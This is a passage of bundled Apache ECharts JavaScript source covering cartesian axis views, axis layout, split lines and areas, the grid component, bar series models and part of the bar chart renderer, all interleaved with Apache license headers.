performed each time update.\n        // So put it here temporarily, although it is not appropriate to\n        // put a model-writing procedure in `view`.\n        this.axisPointerClass && fixValue(axisModel);\n\n        AxisView.superApply(this, 'render', arguments);\n\n        updateAxisPointer(this, axisModel, ecModel, api, payload, true);\n    },\n\n    /**\n     * Action handler.\n     * @public\n     * @param {module:echarts/coord/cartesian/AxisModel} axisModel\n     * @param {module:echarts/model/Global} ecModel\n     * @param {module:echarts/ExtensionAPI} api\n     * @param {Object} payload\n     */\n    updateAxisPointer: function (axisModel, ecModel, api, payload, force) {\n        updateAxisPointer(this, axisModel, ecModel, api, payload, false);\n    },\n\n    /**\n     * @override\n     */\n    remove: function (ecModel, api) {\n        var axisPointer = this._axisPointer;\n        axisPointer && axisPointer.remove(api);\n        AxisView.superApply(this, 'remove', arguments);\n    },\n\n    /**\n     * @override\n     */\n    dispose: function (ecModel, api) {\n        disposeAxisPointer(this, api);\n        AxisView.superApply(this, 'dispose', arguments);\n    }\n\n});\n\nfunction updateAxisPointer(axisView, axisModel, ecModel, api, payload, forceRender) {\n    var Clazz = AxisView.getAxisPointerClass(axisView.axisPointerClass);\n    if (!Clazz) {\n        return;\n    }\n    var axisPointerModel = getAxisPointerModel(axisModel);\n    axisPointerModel\n        ? (axisView._axisPointer || (axisView._axisPointer = new Clazz()))\n            .render(axisModel, axisPointerModel, api, forceRender)\n        : disposeAxisPointer(axisView, api);\n}\n\nfunction disposeAxisPointer(axisView, ecModel, api) {\n    var axisPointer = axisView._axisPointer;\n    axisPointer && axisPointer.dispose(ecModel, api);\n    axisView._axisPointer = null;\n}\n\nvar axisPointerClazz = [];\n\nAxisView.registerAxisPointerClass = function (type, clazz) {\n    if (__DEV__) {\n        if (axisPointerClazz[type]) {\n            throw new Error('axisPointer ' + type + ' exists');\n        }\n    }\n    axisPointerClazz[type] = clazz;\n};\n\nAxisView.getAxisPointerClass = function (type) {\n    return type && axisPointerClazz[type];\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Can only be called after coordinate system creation stage.\n * (Can be called before coordinate system update stage).\n *\n * @param {Object} opt {labelInside}\n * @return {Object} {\n *  position, rotation, labelDirection, labelOffset,\n *  tickDirection, labelRotate, z2\n * }\n */\nfunction layout$1(gridModel, axisModel, opt) {\n    opt = opt || {};\n    var grid = gridModel.coordinateSystem;\n    var axis = axisModel.axis;\n    var layout = {};\n    var otherAxisOnZeroOf = axis.getAxesOnZeroOf()[0];\n\n    var rawAxisPosition = axis.position;\n    var axisPosition = otherAxisOnZeroOf ? 'onZero' : rawAxisPosition;\n    var axisDim = axis.dim;\n\n    var rect = grid.getRect();\n    var rectBound = [rect.x, rect.x + rect.width, rect.y, rect.y + rect.height];\n    var idx = {left: 0, right: 1, top: 0, bottom: 1, onZero: 2};\n    var axisOffset = axisModel.get('offset') || 0;\n\n    var posBound = axisDim === 'x'\n        ? [rectBound[2] - axisOffset, rectBound[3] + axisOffset]\n        : [rectBound[0] - axisOffset, rectBound[1] + axisOffset];\n\n    if (otherAxisOnZeroOf) {\n        var onZeroCoord = otherAxisOnZeroOf.toGlobalCoord(otherAxisOnZeroOf.dataToCoord(0));\n        posBound[idx.onZero] = Math.max(Math.min(onZeroCoord, posBound[1]), posBound[0]);\n    }\n\n    // Axis position\n    layout.position = [\n        axisDim === 'y' ? posBound[idx[axisPosition]] : rectBound[0],\n        axisDim === 'x' ? posBound[idx[axisPosition]] : rectBound[3]\n    ];\n\n    // Axis rotation\n    layout.rotation = Math.PI / 2 * (axisDim === 'x' ? 0 : 1);\n\n    // Tick and label direction, x y is axisDim\n    var dirMap = {top: -1, bottom: 1, left: -1, right: 1};\n\n    layout.labelDirection = layout.tickDirection = layout.nameDirection = dirMap[rawAxisPosition];\n    layout.labelOffset = otherAxisOnZeroOf ? posBound[idx[rawAxisPosition]] - posBound[idx.onZero] : 0;\n\n    if (axisModel.get('axisTick.inside')) {\n        layout.tickDirection = -layout.tickDirection;\n    }\n    if (retrieve(opt.labelInside, axisModel.get('axisLabel.inside'))) {\n        layout.labelDirection = -layout.labelDirection;\n    }\n\n    // Special label rotation\n    var labelRotate = axisModel.get('axisLabel.rotate');\n    layout.labelRotate = axisPosition === 'top' ? -labelRotate : labelRotate;\n\n    // Over splitLine and splitArea\n    layout.z2 = 1;\n\n    return layout;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction rectCoordAxisBuildSplitArea(axisView, axisGroup, axisModel, gridModel) {\n    var axis = axisModel.axis;\n\n    if (axis.scale.isBlank()) {\n        return;\n    }\n\n    var splitAreaModel = axisModel.getModel('splitArea');\n    var areaStyleModel = splitAreaModel.getModel('areaStyle');\n    var areaColors = areaStyleModel.get('color');\n\n    var gridRect = gridModel.coordinateSystem.getRect();\n\n    var ticksCoords = axis.getTicksCoords({\n        tickModel: splitAreaModel,\n        clamp: true\n    });\n\n    if (!ticksCoords.length) {\n        return;\n    }\n\n    // For Making appropriate splitArea animation, the color and anid\n    // should be corresponding to previous one if possible.\n    var areaColorsLen = areaColors.length;\n    var lastSplitAreaColors = axisView.__splitAreaColors;\n    var newSplitAreaColors = createHashMap();\n    var colorIndex = 0;\n    if (lastSplitAreaColors) {\n        for (var i = 0; i < ticksCoords.length; i++) {\n            var cIndex = lastSplitAreaColors.get(ticksCoords[i].tickValue);\n            if (cIndex != null) {\n                colorIndex = (cIndex + (areaColorsLen - 1) * i) % areaColorsLen;\n                break;\n            }\n        }\n    }\n\n    var prev = axis.toGlobalCoord(ticksCoords[0].coord);\n\n    var areaStyle = areaStyleModel.getAreaStyle();\n    areaColors = isArray(areaColors) ? areaColors : [areaColors];\n\n    for (var i = 1; i < ticksCoords.length; i++) {\n        var tickCoord = axis.toGlobalCoord(ticksCoords[i].coord);\n\n        var x;\n        var y;\n        var width;\n        var height;\n        if (axis.isHorizontal()) {\n            x = prev;\n            y = gridRect.y;\n            width = tickCoord - x;\n            height = gridRect.height;\n            prev = x + width;\n        }\n        else {\n            x = gridRect.x;\n            y = prev;\n            width = gridRect.width;\n            height = tickCoord - y;\n            prev = y + height;\n        }\n\n        var tickValue = ticksCoords[i - 1].tickValue;\n        tickValue != null && newSplitAreaColors.set(tickValue, colorIndex);\n\n        axisGroup.add(new Rect({\n            anid: tickValue != null ? 'area_' + tickValue : null,\n            shape: {\n                x: x,\n                y: y,\n                width: width,\n                height: height\n            },\n            style: defaults({\n                fill: areaColors[colorIndex]\n            }, areaStyle),\n            silent: true\n        }));\n\n        colorIndex = (colorIndex + 1) % areaColorsLen;\n    }\n\n    axisView.__splitAreaColors = newSplitAreaColors;\n}\n\nfunction rectCoordAxisHandleRemove(axisView) {\n    axisView.__splitAreaColors = null;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar axisBuilderAttrs = [\n    'axisLine', 'axisTickLabel', 'axisName'\n];\nvar selfBuilderAttrs = [\n    'splitArea', 'splitLine', 'minorSplitLine'\n];\n\nvar CartesianAxisView = AxisView.extend({\n\n    type: 'cartesianAxis',\n\n    axisPointerClass: 'CartesianAxisPointer',\n\n    /**\n     * @override\n     */\n    render: function (axisModel, ecModel, api, payload) {\n\n        this.group.removeAll();\n\n        var oldAxisGroup = this._axisGroup;\n        this._axisGroup = new Group();\n\n        this.group.add(this._axisGroup);\n\n        if (!axisModel.get('show')) {\n            return;\n        }\n\n        var gridModel = axisModel.getCoordSysModel();\n\n        var layout = layout$1(gridModel, axisModel);\n\n        var axisBuilder = new AxisBuilder(axisModel, layout);\n\n        each$1(axisBuilderAttrs, axisBuilder.add, axisBuilder);\n\n        this._axisGroup.add(axisBuilder.getGroup());\n\n        each$1(selfBuilderAttrs, function (name) {\n            if (axisModel.get(name + '.show')) {\n                this['_' + name](axisModel, gridModel);\n            }\n        }, this);\n\n        groupTransition(oldAxisGroup, this._axisGroup, axisModel);\n\n        CartesianAxisView.superCall(this, 'render', axisModel, ecModel, api, payload);\n    },\n\n    remove: function () {\n        rectCoordAxisHandleRemove(this);\n    },\n\n    /**\n     * @param {module:echarts/coord/cartesian/AxisModel} axisModel\n     * @param {module:echarts/coord/cartesian/GridModel} gridModel\n     * @private\n     */\n    _splitLine: function (axisModel, gridModel) {\n        var axis = axisModel.axis;\n\n        if (axis.scale.isBlank()) {\n            return;\n        }\n\n        var splitLineModel = axisModel.getModel('splitLine');\n        var lineStyleModel = splitLineModel.getModel('lineStyle');\n        var lineColors = lineStyleModel.get('color');\n\n        lineColors = isArray(lineColors) ? lineColors : [lineColors];\n\n        var gridRect = gridModel.coordinateSystem.getRect();\n        var isHorizontal = axis.isHorizontal();\n\n        var lineCount = 0;\n\n        var ticksCoords = axis.getTicksCoords({\n            tickModel: splitLineModel\n        });\n\n        var p1 = [];\n        var p2 = [];\n\n        var lineStyle = lineStyleModel.getLineStyle();\n        for (var i = 0; i < ticksCoords.length; i++) {\n            var tickCoord = axis.toGlobalCoord(ticksCoords[i].coord);\n\n            if (isHorizontal) {\n                p1[0] = tickCoord;\n                p1[1] = gridRect.y;\n                p2[0] = tickCoord;\n                p2[1] = gridRect.y + gridRect.height;\n            }\n            else {\n                p1[0] = gridRect.x;\n                p1[1] = tickCoord;\n                p2[0] = gridRect.x + gridRect.width;\n                p2[1] = tickCoord;\n            }\n\n            var colorIndex = (lineCount++) % lineColors.length;\n            var tickValue = ticksCoords[i].tickValue;\n            this._axisGroup.add(new Line({\n                anid: tickValue != null ? 'line_' + ticksCoords[i].tickValue : null,\n                subPixelOptimize: true,\n                shape: {\n                    x1: p1[0],\n                    y1: p1[1],\n                    x2: p2[0],\n                    y2: p2[1]\n                },\n                style: defaults({\n                    stroke: lineColors[colorIndex]\n                }, lineStyle),\n                silent: true\n            }));\n        }\n    },\n\n    /**\n     * @param {module:echarts/coord/cartesian/AxisModel} axisModel\n     * @param {module:echarts/coord/cartesian/GridModel} gridModel\n     * @private\n     */\n    _minorSplitLine: function (axisModel, gridModel) {\n        var axis = axisModel.axis;\n\n        var minorSplitLineModel = axisModel.getModel('minorSplitLine');\n        var lineStyleModel = minorSplitLineModel.getModel('lineStyle');\n\n        var gridRect = gridModel.coordinateSystem.getRect();\n        var isHorizontal = axis.isHorizontal();\n\n        var minorTicksCoords = axis.getMinorTicksCoords();\n        if (!minorTicksCoords.length) {\n            return;\n        }\n        var p1 = [];\n        var p2 = [];\n\n        var lineStyle = lineStyleModel.getLineStyle();\n\n\n        for (var i = 0; i < minorTicksCoords.length; i++) {\n            for (var k = 0; k < minorTicksCoords[i].length; k++) {\n                var tickCoord = axis.toGlobalCoord(minorTicksCoords[i][k].coord);\n\n                if (isHorizontal) {\n                    p1[0] = tickCoord;\n                    p1[1] = gridRect.y;\n                    p2[0] = tickCoord;\n                    p2[1] = gridRect.y + gridRect.height;\n                }\n                else {\n                    p1[0] = gridRect.x;\n                    p1[1] = tickCoord;\n                    p2[0] = gridRect.x + gridRect.width;\n                    p2[1] = tickCoord;\n                }\n\n                this._axisGroup.add(new Line({\n                    anid: 'minor_line_' + minorTicksCoords[i][k].tickValue,\n                    subPixelOptimize: true,\n                    shape: {\n                        x1: p1[0],\n                        y1: p1[1],\n                        x2: p2[0],\n                        y2: p2[1]\n                    },\n                    style: lineStyle,\n                    silent: true\n                }));\n            }\n        }\n    },\n\n    /**\n     * @param {module:echarts/coord/cartesian/AxisModel} axisModel\n     * @param {module:echarts/coord/cartesian/GridModel} gridModel\n     * @private\n     */\n    _splitArea: function (axisModel, gridModel) {\n        rectCoordAxisBuildSplitArea(this, this._axisGroup, axisModel, gridModel);\n    }\n});\n\nCartesianAxisView.extend({\n    type: 'xAxis'\n});\nCartesianAxisView.extend({\n    type: 'yAxis'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Grid view\nextendComponentView({\n\n    type: 'grid',\n\n    render: function (gridModel, ecModel) {\n        this.group.removeAll();\n        if (gridModel.get('show')) {\n            this.group.add(new Rect({\n                shape: gridModel.coordinateSystem.getRect(),\n                style: defaults({\n                    fill: gridModel.get('backgroundColor')\n                }, gridModel.getItemStyle()),\n                silent: true,\n                z2: -1\n            }));\n        }\n    }\n\n});\n\nregisterPreprocessor(function (option) {\n    // Only create grid when need\n    if (option.xAxis && option.yAxis && !option.grid) {\n        option.grid = {};\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// In case developer forget to include grid component\nregisterVisual(visualSymbol('line', 'circle', 'line'));\nregisterLayout(pointsLayout('line'));\n\n// Down sample after filter\nregisterProcessor(\n    PRIORITY.PROCESSOR.STATISTIC,\n    dataSample('line')\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar BaseBarSeries = SeriesModel.extend({\n\n    type: 'series.__base_bar__',\n\n    getInitialData: function (option, ecModel) {\n        return createListFromArray(this.getSource(), this, {useEncodeDefaulter: true});\n    },\n\n    getMarkerPosition: function (value) {\n        var coordSys = this.coordinateSystem;\n        if (coordSys) {\n            // PENDING if clamp ?\n            var pt = coordSys.dataToPoint(coordSys.clampData(value));\n            var data = this.getData();\n            var offset = data.getLayout('offset');\n            var size = data.getLayout('size');\n            var offsetIndex = coordSys.getBaseAxis().isHorizontal() ? 0 : 1;\n            pt[offsetIndex] += offset + size / 2;\n            return pt;\n        }\n        return [NaN, NaN];\n    },\n\n    defaultOption: {\n        zlevel: 0,                  // 一级层叠\n        z: 2,                       // 二级层叠\n        coordinateSystem: 'cartesian2d',\n        legendHoverLink: true,\n        // stack: null\n\n        // Cartesian coordinate system\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        // 最小高度改为0\n        barMinHeight: 0,\n        // 最小角度为0，仅对极坐标系下的柱状图有效\n        barMinAngle: 0,\n        // cursor: null,\n\n        large: false,\n        largeThreshold: 400,\n        progressive: 3e3,\n        progressiveChunkMode: 'mod',\n\n        // barMaxWidth: null,\n\n        // In cartesian, the default value is 1. Otherwise null.\n        // barMinWidth: null,\n\n        // 默认自适应\n        // barWidth: null,\n        // 柱间距离，默认为柱形宽度的30%，可设固定值\n        // barGap: '30%',\n        // 类目间柱形距离，默认为类目间距的20%，可设固定值\n        // barCategoryGap: '20%',\n        // label: {\n        //      show: false\n        // },\n        itemStyle: {},\n        emphasis: {}\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nBaseBarSeries.extend({\n\n    type: 'series.bar',\n\n    dependencies: ['grid', 'polar'],\n\n    brushSelector: 'rect',\n\n    /**\n     * @override\n     */\n    getProgressive: function () {\n        // Do not support progressive in normal mode.\n        return this.get('large')\n            ? this.get('progressive')\n            : false;\n    },\n\n    /**\n     * @override\n     */\n    getProgressiveThreshold: function () {\n        // Do not support progressive in normal mode.\n        var progressiveThreshold = this.get('progressiveThreshold');\n        var largeThreshold = this.get('largeThreshold');\n        if (largeThreshold > progressiveThreshold) {\n            progressiveThreshold = largeThreshold;\n        }\n        return progressiveThreshold;\n    },\n\n    defaultOption: {\n        // If clipped\n        // Only available on cartesian2d\n        clip: true,\n\n        // If use caps on two sides of bars\n        // Only available on tangential polar bar\n        roundCap: false,\n\n        showBackground: false,\n        backgroundStyle: {\n            color: 'rgba(180, 180, 180, 0.2)',\n            borderColor: null,\n            borderWidth: 0,\n            borderType: 'solid',\n            borderRadius: 0,\n            shadowBlur: 0,\n            shadowColor: null,\n            shadowOffsetX: 0,\n            shadowOffsetY: 0,\n            opacity: 1\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction setLabel(\n    normalStyle, hoverStyle, itemModel, color, seriesModel, dataIndex, labelPositionOutside\n) {\n    var labelModel = itemModel.getModel('label');\n    var hoverLabelModel = itemModel.getModel('emphasis.label');\n\n    setLabelStyle(\n        normalStyle, hoverStyle, labelModel, hoverLabelModel,\n        {\n            labelFetcher: seriesModel,\n            labelDataIndex: dataIndex,\n            defaultText: getDefaultLabel(seriesModel.getData(), dataIndex),\n            isRectText: true,\n            autoColor: color\n        }\n    );\n\n    fixPosition(normalStyle);\n    fixPosition(hoverStyle);\n}\n\nfunction fixPosition(style, labelPositionOutside) {\n    if (style.textPosition === 'outside') {\n        style.textPosition = labelPositionOutside;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar getBarItemStyle = makeStyleMapper(\n    [\n        ['fill', 'color'],\n        ['stroke', 'borderColor'],\n        ['lineWidth', 'borderWidth'],\n        // Compatitable with 2\n        ['stroke', 'barBorderColor'],\n        ['lineWidth', 'barBorderWidth'],\n        ['opacity'],\n        ['shadowBlur'],\n        ['shadowOffsetX'],\n        ['shadowOffsetY'],\n        ['shadowColor']\n    ]\n);\n\nvar barItemStyle = {\n    getBarItemStyle: function (excludes) {\n        var style = getBarItemStyle(this, excludes);\n        if (this.getBorderLineDash) {\n            var lineDash = this.getBorderLineDash();\n            lineDash && (style.lineDash = lineDash);\n        }\n        return style;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Sausage: similar to sector, but have half circle on both sides\n * @public\n */\nvar Sausage = extendShape({\n\n    type: 'sausage',\n\n    shape: {\n\n        cx: 0,\n\n        cy: 0,\n\n        r0: 0,\n\n        r: 0,\n\n        startAngle: 0,\n\n        endAngle: Math.PI * 2,\n\n        clockwise: true\n    },\n\n    buildPath: function (ctx, shape) {\n        var x = shape.cx;\n        var y = shape.cy;\n        var r0 = Math.max(shape.r0 || 0, 0);\n        var r = Math.max(shape.r, 0);\n        var dr = (r - r0) * 0.5;\n        var rCenter = r0 + dr;\n        var startAngle = shape.startAngle;\n        var endAngle = shape.endAngle;\n        var clockwise = shape.clockwise;\n\n        var unitStartX = Math.cos(startAngle);\n        var unitStartY = Math.sin(startAngle);\n        var unitEndX = Math.cos(endAngle);\n        var unitEndY = Math.sin(endAngle);\n\n        var lessThanCircle = clockwise\n            ? endAngle - startAngle < Math.PI * 2\n            : startAngle - endAngle < Math.PI * 2;\n\n        if (lessThanCircle) {\n            ctx.moveTo(unitStartX * r0 + x, unitStartY * r0 + y);\n\n            ctx.arc(\n                unitStartX * rCenter + x, unitStartY * rCenter + y, dr,\n                -Math.PI + startAngle, startAngle, !clockwise\n            );\n        }\n\n        ctx.arc(x, y, r, startAngle, endAngle, !clockwise);\n\n        ctx.moveTo(unitEndX * r + x, unitEndY * r + y);\n\n        ctx.arc(\n            unitEndX * rCenter + x, unitEndY * rCenter + y, dr,\n            endAngle - Math.PI * 2, endAngle - Math.PI, !clockwise\n        );\n\n        if (r0 !== 0) {\n            ctx.arc(x, y, r0, endAngle, startAngle, clockwise);\n\n            ctx.moveTo(unitStartX * r0 + x, unitEndY * r0 + y);\n        }\n\n        ctx.closePath();\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar BAR_BORDER_WIDTH_QUERY = ['itemStyle', 'barBorderWidth'];\nvar _eventPos = [0, 0];\n\n// FIXME\n// Just for compatible with ec2.\nextend(Model.prototype, barItemStyle);\n\nfunction getClipArea(coord, data) {\n    var coordSysClipArea = coord.getArea && coord.getArea();\n    if (coord.type === 'cartesian2d') {\n        var baseAxis = coord.getBaseAxis();\n        // When boundaryGap is false or using time axis. bar may exceed the grid.\n        // We should not clip this part.\n        // See test/bar2.html\n        if (baseAxis.type !== 'category' || !baseAxis.onBand) {\n            var expandWidth = data.getLayout('bandWidth');\n            if (baseAxis.isHorizontal()) {\n                coordSysClipArea.x -= expandWidth;\n                coordSysClipArea.width += expandWidth * 2;\n            }\n            else {\n                coordSysClipArea.y -= expandWidth;\n                coordSysClipArea.height += expandWidth * 2;\n            }\n        }\n    }\n\n    return coordSysClipArea;\n}\n\nextendChartView({\n\n    type: 'bar',\n\n    render: function (seriesModel, ecModel, api) {\n        this._updateDrawMode(seriesModel);\n\n        var coordinateSystemType = seriesModel.get('coordinateSystem');\n\n        if (coordinateSystemType === 'cartesian2d'\n            || coordinateSystemType === 'polar'\n        ) {\n            this._isLargeDraw\n                ? this._renderLarge(seriesModel, ecModel, api)\n                : this._renderNormal(seriesModel, ecModel, api);\n        }\n        else if (__DEV__) {\n            console.warn('Only cartesian2d and polar supported for bar.');\n        }\n\n        return this.group;\n    },\n\n    incrementalPrepareRender: function (seriesModel, ecModel, api) {\n        this._clear();\n        this._updateDrawMode(seriesModel);\n    },\n\n    incrementalRender: function (params, seriesModel, ecModel, api) {\n        // Do not support progressive in normal mode.\n        this._incrementalRenderLarge(params, seriesModel);\n    },\n\n    _updateDrawMode: function (seriesModel) {\n        var isLargeDraw = seriesModel.pipelineContext.large;\n        if (this._isLargeDraw == null || isLargeDraw ^ this._isLargeDraw) {\n            this._isLargeDraw = isLargeDraw;\n            this._clear();\n        }\n    },\n\n    _renderNormal: function (seriesModel, ecModel, api) {\n        var group = this.group;\n        var data = seriesModel.getData();\n        var oldData = this._data;\n\n        var coord = seriesModel.coordinateSystem;\n        var baseAxis = coord.getBaseAxis();\n        var isHorizontalOrRadial;\n\n        if (coord.type === 'cartesian2d') {\n            isHorizontalOrRadial = baseAxis.isHorizontal();\n        }\n        else if (coord.type === 'polar') {\n            isHorizontalOrRadial = baseAxis.dim === 'angle';\n        }\n\n        var animationModel = seriesModel.isAnimationEnabled() ? seriesModel : null;\n\n        var needsClip = seriesModel.get('clip', true);\n        var coordSysClipArea = getClipArea(coord, data);\n        // If there is clipPath created in large mode. Remove it.\n        group.removeClipPath();\n        // We don't use clipPath in normal mode because we needs a perfect animation\n        // And don't want the label are clipped.\n\n        var roundCap = seriesModel.get('roundCap', true);\n\n        var drawBackground = seriesModel.get('showBackground', true);\n        var backgroundModel = seriesModel.getModel('backgroundStyle');\n\n        var bgEls = [];\n        var oldBgEls = this._backgroundEls || [];\n\n        data.diff(oldData)\n            .add(function (dataIndex) {\n                var itemModel = data.getItemModel(dataIndex);\n                var layout = getLayout[coord.type](data, dataIndex, itemModel);\n\n                if (drawBackground) {\n                    var bgEl = createBackgroundEl(coord, isHorizontalOrRadial, layout);\n                    bgEl.useStyle(backgroundModel.getBarItemStyle());\n                    bgEls[dataIndex] = bgEl;\n                }\n\n                // If dataZoom in filteMode: 'empty', the baseValue can be set as NaN in \"axisProxy\".\n                if (!data.hasValue(dataIndex)) {\n                    return;\n                }\n\n                if (needsClip) {\n                    // Clip will modify the layout params.\n                    // And return a boolean to determine if the shape are fully clipped.\n                    var isClipped = clip[coord.type](coordSysClipArea, layout);\n                    if (isClipped) {\n                        group.remove(el);\n                        return;\n                    }\n                }\n\n                var el = elementCreator[coord.type](\n                    dataIndex, layout, isHorizontalOrRadial, animationModel, false, roundCap\n                );\n                data.setItemGraphicEl(dataIndex, el);\n                group.add(el);\n\n                updateStyle(\n                    el, data, dataIndex, itemModel, layout,\n                    seriesModel, isHorizontalOrRadial, coord.type === 'polar'\n                );\n            })\n            .update(function (newIndex, oldIndex) {\n                var itemModel = data.getItemModel(newIndex);\n                var layout = getLayout[coord.type](data, newIndex, itemModel);\n\n                if (drawBackground) {\n                    var bgEl = oldBgEls[oldIndex];\n                    bgEl.useStyle(backgroundModel.getBarItemStyle());\n                    bgEls[newIndex] = 